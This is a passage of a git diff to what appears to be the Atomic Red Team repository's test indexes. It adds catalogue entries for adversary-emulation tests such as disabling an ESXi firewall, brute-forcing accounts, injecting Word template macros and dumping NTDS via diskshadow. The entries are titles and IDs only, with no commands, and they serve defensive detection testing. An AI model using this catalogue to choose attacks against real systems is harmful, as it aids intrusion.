Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 9aef64ae14..170fd6d2cd 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -13,6 +13,7 @@ defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,10,Execution o defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,11,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,12,Rundll32 with Control_RunDLL,e4c04b6f-c492-4782-82c7-3bf75eb8077e,command_prompt defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,13,Rundll32 with desk.cpl,83a95136-a496-423c-81d3-1c6750133917,command_prompt +defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,14,Running DLL with .init extension and function,2d5029f0-ae20-446f-8811-e7511b58e8b6,command_prompt defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh @@ -238,6 +239,7 @@ defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,19, defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,20,LockBit Black - Unusual Windows firewall registry modification -cmd,a4651931-ebbb-4cde-9363-ddf3d66214cb,command_prompt defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,21,LockBit Black - Unusual Windows firewall registry modification -Powershell,80b453d1-eec5-4144-bf08-613a6c3ffe12,powershell defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,22,Blackbit - Disable Windows Firewall using netsh firewall,91f348e6-3760-4997-a93b-2ceee7f254ee,command_prompt +defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,23,ESXi - Disable Firewall via Esxcli,bac8a340-be64-4491-a0cc-0985cb227f5a,command_prompt defense-evasion,T1553.003,Subvert Trust Controls: SIP and Trust Provider Hijacking,1,SIP (Subject Interface Package) Hijacking via Custom DLL,e12f5d8d-574a-4e9d-8a84-c0e8b4a8a675,command_prompt defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell defense-evasion,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash @@ -1082,6 +1084,7 @@ persistence,T1136.002,Create Account: Domain Account,2,Create a new account simi persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell persistence,T1136.002,Create Account: Domain Account,4,Active Directory Create Admin Account,562aa072-524e-459a-ba2b-91f1afccf5ab,sh persistence,T1136.002,Create Account: Domain Account,5,Active Directory Create User Account (Non-elevated),8c992cb3-a46e-4fd5-b005-b1bab185af31,sh +persistence,T1137.001,Office Application Startup: Office Template Macros.,1,Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell,940db09e-80b6-4dd0-8d4d-7764f89b47a8,powershell persistence,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell persistence,T1547.015,Boot or Logon Autostart Execution: Login Items,1,Persistence by modifying Windows Terminal profile,ec5d76ef-82fe-48da-b931-bdb25a62bc65,powershell persistence,T1547.015,Boot or Logon Autostart Execution: Login Items,2,Add macOS LoginItem using Applescript,716e756a-607b-41f3-8204-b214baf37c1d,bash @@ -1278,6 +1281,7 @@ collection,T1560.001,Archive Collected Data: Archive via Utility,6,Data Compress collection,T1560.001,Archive Collected Data: Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh collection,T1560.001,Archive Collected Data: Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh collection,T1560.001,Archive Collected Data: Archive via Utility,9,Encrypts collected data with AES-256 and Base64,a743e3a6-e8b2-4a30-abe7-ca85d201b5d3,bash +collection,T1560.001,Archive Collected Data: Archive via Utility,10,ESXi - Remove Syslog remote IP,36c62584-d360-41d6-886f-d194654be7c2,powershell collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash @@ -1373,6 +1377,7 @@ credential-access,T1110.001,Brute Force: Password Guessing,4,Password Brute User credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO Brute Force - Debian,ba1bf0b6-f32b-4db0-b7cc-d78cacc76700,bash credential-access,T1110.001,Brute Force: Password Guessing,6,SUDO Brute Force - Redhat,4097bc00-5eeb-4d56-aaf9-287d60351d95,bash credential-access,T1110.001,Brute Force: Password Guessing,7,SUDO Brute Force - FreeBSD,abcde488-e083-4ee7-bc85-a5684edd7541,bash +credential-access,T1110.001,Brute Force: Password Guessing,8,ESXi - Brute Force Until Account Lockout,ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5,powershell credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell @@ -1533,6 +1538,7 @@ credential-access,T1003.003,OS Credential Dumping: NTDS,5,Create Volume Shadow C credential-access,T1003.003,OS Credential Dumping: NTDS,6,Create Volume Shadow Copy remotely (WMI) with esentutl,21c7bf80-3e8b-40fa-8f9d-f5b194ff2865,command_prompt credential-access,T1003.003,OS Credential Dumping: NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell credential-access,T1003.003,OS Credential Dumping: NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt +credential-access,T1003.003,OS Credential Dumping: NTDS,9,Create Volume Shadow Copy with diskshadow,b385996c-0e7d-4e27-95a4-aca046b119a7,command_prompt credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 9d30266e31..5856731b37 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -13,6 +13,7 @@ defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,10,Execution o defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,11,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,12,Rundll32 with Control_RunDLL,e4c04b6f-c492-4782-82c7-3bf75eb8077e,command_prompt defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,13,Rundll32 with desk.cpl,83a95136-a496-423c-81d3-1c6750133917,command_prompt +defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,14,Running DLL with .init extension and function,2d5029f0-ae20-446f-8811-e7511b58e8b6,command_prompt defense-evasion,T1216.001,Signed Script Proxy Execution: Pubprn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt @@ -144,6 +145,7 @@ defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,6,A defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,20,LockBit Black - Unusual Windows firewall registry modification -cmd,a4651931-ebbb-4cde-9363-ddf3d66214cb,command_prompt defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,21,LockBit Black - Unusual Windows firewall registry modification -Powershell,80b453d1-eec5-4144-bf08-613a6c3ffe12,powershell defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,22,Blackbit - Disable Windows Firewall using netsh firewall,91f348e6-3760-4997-a93b-2ceee7f254ee,command_prompt +defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,23,ESXi - Disable Firewall via Esxcli,bac8a340-be64-4491-a0cc-0985cb227f5a,command_prompt defense-evasion,T1553.003,Subvert Trust Controls: SIP and Trust Provider Hijacking,1,SIP (Subject Interface Package) Hijacking via Custom DLL,e12f5d8d-574a-4e9d-8a84-c0e8b4a8a675,command_prompt defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt @@ -731,6 +733,7 @@ persistence,T1546.008,Event Triggered Execution: Accessibility Features,4,Atbrok persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell +persistence,T1137.001,Office Application Startup: Office Template Macros.,1,Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell,940db09e-80b6-4dd0-8d4d-7764f89b47a8,powershell persistence,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell persistence,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription - CommandLineEventConsumer,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell persistence,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,2,Persistence via WMI Event Subscription - ActiveScriptEventConsumer,fecd0dfd-fb55-45fa-a10b-6250272d0832,powershell @@ -850,6 +853,7 @@ collection,T1560.001,Archive Collected Data: Archive via Utility,1,Compress Data collection,T1560.001,Archive Collected Data: Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt collection,T1560.001,Archive Collected Data: Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt collection,T1560.001,Archive Collected Data: Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt +collection,T1560.001,Archive Collected Data: Archive via Utility,10,ESXi - Remove Syslog remote IP,36c62584-d360-41d6-886f-d194654be7c2,powershell collection,T1113,Screen Capture,7,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell collection,T1113,Screen Capture,8,Windows Screen Capture (CopyFromScreen),e9313014-985a-48ef-80d9-cde604ffc187,powershell collection,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell @@ -901,6 +905,7 @@ credential-access,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8 credential-access,T1110.001,Brute Force: Password Guessing,1,Brute Force Credentials of single Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt credential-access,T1110.001,Brute Force: Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell credential-access,T1110.001,Brute Force: Password Guessing,4,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell +credential-access,T1110.001,Brute Force: Password Guessing,8,ESXi - Brute Force Until Account Lockout,ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5,powershell credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell @@ -1008,6 +1013,7 @@ credential-access,T1003.003,OS Credential Dumping: NTDS,5,Create Volume Shadow C credential-access,T1003.003,OS Credential Dumping: NTDS,6,Create Volume Shadow Copy remotely (WMI) with esentutl,21c7bf80-3e8b-40fa-8f9d-f5b194ff2865,command_prompt credential-access,T1003.003,OS Credential Dumping: NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell credential-access,T1003.003,OS Credential Dumping: NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt +credential-access,T1003.003,OS Credential Dumping: NTDS,9,Create Volume Shadow Copy with diskshadow,b385996c-0e7d-4e27-95a4-aca046b119a7,command_prompt credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index ea1b990398..fd953ca94c 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -18,6 +18,7 @@ - Atomic Test #11: Rundll32 with Ordinal Value [windows] - Atomic Test #12: Rundll32 with Control_RunDLL [windows] - Atomic Test #13: Rundll32 with desk.cpl [windows] + - Atomic Test #14: Running DLL with .init extension and function [windows] - T1027.009 Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) - Atomic Test #1: Malicious PAM rule [linux] @@ -300,6 +301,7 @@ - Atomic Test #20: LockBit Black - Unusual Windows firewall registry modification -cmd [windows] - Atomic Test #21: LockBit Black - Unusual Windows firewall registry modification -Powershell [windows] - Atomic Test #22: Blackbit - Disable Windows Firewall using netsh firewall [windows] + - Atomic Test #23: ESXi - Disable Firewall via Esxcli [windows] - [T1553.003 Subvert Trust Controls: SIP and Trust Provider Hijacking](../../T1553.003/T1553.003.md) - Atomic Test #1: SIP (Subject Interface Package) Hijacking via Custom DLL [windows] - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -1473,7 +1475,8 @@ - Atomic Test #4: Active Directory Create Admin Account [linux] - Atomic Test #5: Active Directory Create User Account (Non-elevated) [linux] - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) -- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) +- [T1137.001 Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) + - Atomic Test #1: Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell [windows] - [T1546.009 Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) - Atomic Test #1: Create registry persistence via AppCert DLL [windows] - T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -1776,6 +1779,7 @@ - Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos] - Atomic Test #8: Data Encrypted with zip and gpg symmetric [linux, macos] - Atomic Test #9: Encrypts collected data with AES-256 and Base64 [linux, macos] + - Atomic Test #10: ESXi - Remove Syslog remote IP [windows] - [T1113 Screen Capture](../../T1113/T1113.md) - Atomic Test #1: Screencapture [macos] - Atomic Test #2: Screencapture (silent) [macos] @@ -1938,6 +1942,7 @@ - Atomic Test #5: SUDO Brute Force - Debian [linux] - Atomic Test #6: SUDO Brute Force - Redhat [linux] - Atomic Test #7: SUDO Brute Force - FreeBSD [linux] + - Atomic Test #8: ESXi - Brute Force Until Account Lockout [windows] - [T1003 OS Credential Dumping](../../T1003/T1003.md) - Atomic Test #1: Gsecdump [windows] - Atomic Test #2: Credential Dumping with NPPSpy [windows] @@ -2152,6 +2157,7 @@ - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows] - Atomic Test #7: Create Volume Shadow Copy with Powershell [windows] - Atomic Test #8: Create Symlink to Volume Shadow Copy [windows] + - Atomic Test #9: Create Volume Shadow Copy with diskshadow [windows] - [T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md) - Atomic Test #1: Request for service tickets [windows] - Atomic Test #2: Rubeus kerberoast [windows] diff --git a/atomics/Indexes/Indexes-Markdown/office-365-index.md b/atomics/Indexes/Indexes-Markdown/office-365-index.md index 8be13605ae..1346b07b4f 100644 --- a/atomics/Indexes/Indexes-Markdown/office-365-index.md +++ b/atomics/Indexes/Indexes-Markdown/office-365-index.md @@ -93,7 +93,7 @@ - T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) -- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) +- T1137.001 Office Application Startup: Office Template Macros. [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1136.003 Create Account: Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 8b14186cf9..87339692e8 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -18,6 +18,7 @@ - Atomic Test #11: Rundll32 with Ordinal Value [windows] - Atomic Test #12: Rundll32 with Control_RunDLL [windows] - Atomic Test #13: Rundll32 with desk.cpl [windows] + - Atomic Test #14: Running DLL with .init extension and function [windows] - T1027.009 Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1216.001 Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows] @@ -194,6 +195,7 @@ - Atomic Test #20: LockBit Black - Unusual Windows firewall registry modification -cmd [windows] - Atomic Test #21: LockBit Black - Unusual Windows firewall registry modification -Powershell [windows] - Atomic Test #22: Blackbit - Disable Windows Firewall using netsh firewall [windows] + - Atomic Test #23: ESXi - Disable Firewall via Esxcli [windows] - [T1553.003 Subvert Trust Controls: SIP and Trust Provider Hijacking](../../T1553.003/T1553.003.md) - Atomic Test #1: SIP (Subject Interface Package) Hijacking via Custom DLL [windows] - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -1021,7 +1023,8 @@ - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows] - Atomic Test #3: Create a new Domain Account using PowerShell [windows] - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) -- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) +- [T1137.001 Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) + - Atomic Test #1: Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell [windows] - [T1546.009 Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) - Atomic Test #1: Create registry persistence via AppCert DLL [windows] - T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -1230,6 +1233,7 @@ - Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows] - Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows] - Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows] + - Atomic Test #10: ESXi - Remove Syslog remote IP [windows] - [T1113 Screen Capture](../../T1113/T1113.md) - Atomic Test #7: Windows Screencapture [windows] - Atomic Test #8: Windows Screen Capture (CopyFromScreen) 